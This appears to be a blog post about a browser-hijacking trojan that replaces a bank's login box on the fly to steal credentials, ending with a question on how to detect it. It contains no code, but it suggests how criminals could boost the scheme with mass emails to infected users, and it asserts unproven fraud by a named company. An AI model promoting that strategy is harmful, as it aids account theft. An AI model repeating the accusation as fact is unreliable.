This is potentially one of the worst nightmares for security experts. This type of fraud has been observed in the context of click fraud, but the payload potential is far bigger if it ever gets implemented to steal bank account login/password.
About the scheme:
An infected user - his computer has been infected by a virus, and (say) Firefox is now corrupt on his computer -
tries to logon to his bank account. He types the correct domain name (say www.key.com) on the URL box in Firefox,
and the real key.com webpage in question shows up. But when the key.com page shows us on the browser, everything is legit except the key.com login box that was substituted, on the fly, by a script on your hijacked computer, planted by a Botnet client who wants to access your bank account to make wire transfers to his account.
Once you enter your login/password in the box, your info gets transferred to the criminals. If the criminals are
smart enough, you won't notice anything: after entering your credentials, maybe you get served a genuine key.com error page, but it's too late: criminals got your login/password and are now wiring all your money to external bank accounts.
A potential strategy, for criminals to make this system more effective, is to have the Botnet operator send millions of email messages to users known to be infected by its Botnet. The Botnet operator just have to send a message (that will look very legitimate), providing the real URL for you to sign up on your real key.com account (or just asking you to log on to your bank account without providing any link, to bypass spam traps), knowing that your browser is infected.
While I haven't seen any scheme like this so far (involving hijacking your bank account via browser sign-on Trojan
through browser infection), I've seen the exact same scheme used in the context of click fraud, deployed by a company known as MediaForce.com, still operating as of today, substituting genuine banner ads by fake ones - to promote their porn and Viagra ads from their clients, on legitimate websites, to users with browser infected by their adware.
Question for data scientists: how would you detect such a scheme?